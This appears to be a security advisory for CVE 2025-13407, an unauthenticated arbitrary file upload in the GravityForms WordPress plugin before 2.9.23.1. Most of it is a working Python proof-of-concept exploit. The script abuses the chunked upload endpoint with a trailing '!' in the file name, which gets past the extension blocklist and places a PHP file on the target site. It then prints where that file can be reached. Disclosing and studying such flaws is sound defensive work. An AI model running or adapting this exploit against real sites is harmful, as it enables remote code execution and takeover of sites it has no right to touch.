GravityForms < 2.9.23.1 – Unauthenticated Arbitrary File Upload | CVE 2025-13407

Description

The plugin does not properly prevent users from uploading dangerous files through its chunked upload functionality, allowing attackers to upload PHP files to affected sites and achieve Remote Code Execution, granted they can discover or enumerate the upload path.

Proof of Concept

Set up a page with a form that only has a file upload field, with the "Enable Multi-File Upload" option set, then run the following script:

import io
import sys
import json
import base64
import requests
from datetime import datetime
from bs4 import BeautifulSoup

# Given a <form> node, return all inputs except file/submit/buttons
def find_inputs_in_form(form):
    data = {}
    for i in form.find_all('input'):
        name = i.get('name')
        if not name or i.get('type') in ('file', 'submit', 'button'):
            continue
        data[name] = i.get('value', '')
    return data

if __name__ == '__main__':
    if len(sys.argv) != 2:
        raise SystemExit(f'USE: python {sys.argv[0]} <form-url>')

    url = sys.argv[1]

    html = requests.get(url).text
    soup = BeautifulSoup(html, 'html.parser')

    # Find the post image input
    multi_file_upload_field = soup.select_one('.gform_fileupload_multifile')
    form = multi_file_upload_field.find_parent('form')

    # Figure out the form & file upload field IDs
    form_id, field_id = multi_file_upload_field['id'].split('_')[-2:]

    # Collect all form input tags
    form_data = find_inputs_in_form(form)



    # Upload PHP file using the chunked uploads functionality
    res = requests.post(f'{url}/?gf_page=upload', 
        files={
            'file': ('phpinfo.php', io.BytesIO(b'<?php phpinfo();'))}, 
        data={
            'gform_unique_id': 'staticidfortesting',
            # The exclamation mark is sanitized by sanitize_file_name() _after_ the blocked extensions check happens.
            'name': 'phpinfo.php!',
            'original_filename': 'phpinfo.php!',
            'field_id': field_id,
            'form_id': form_id,
            'chunk': 0,
            'chunks': 2,
    }).text.split('\n')[-1]
    res = json.loads(res)
    print(res)

    res = requests.post(f'{url}/?gf_page=upload', 
        files={
            'file': ('image.jpg', io.BytesIO(b'// Chunk 2 data'))}, 
        data={
            'gform_unique_id': 'staticidfortesting',
            # The exclamation mark is sanitized by sanitize_file_name() _after_ the blocked extensions check happens.
            'name': 'image.jpg',
            'original_filename': 'image.jpg',
            'field_id': field_id,
            'form_id': form_id,
            'chunk': 1,
            'chunks': 2,
            # Reuse the hash & temp_filename from the first chunk upload
            'image_jpg[hash]': res['data']['hash'],
            'image_jpg[temp_filename]': res['data']['temp_filename']
    }).text.split('\n')[-1]
    res = json.loads(res)

    
    print(f'Uploaded file is accessible at: ./wp-content/uploads/gravity_forms/{form_id}-$RANDOMHEXSTRING/tmp/{res["data"]["temp_filename"]}')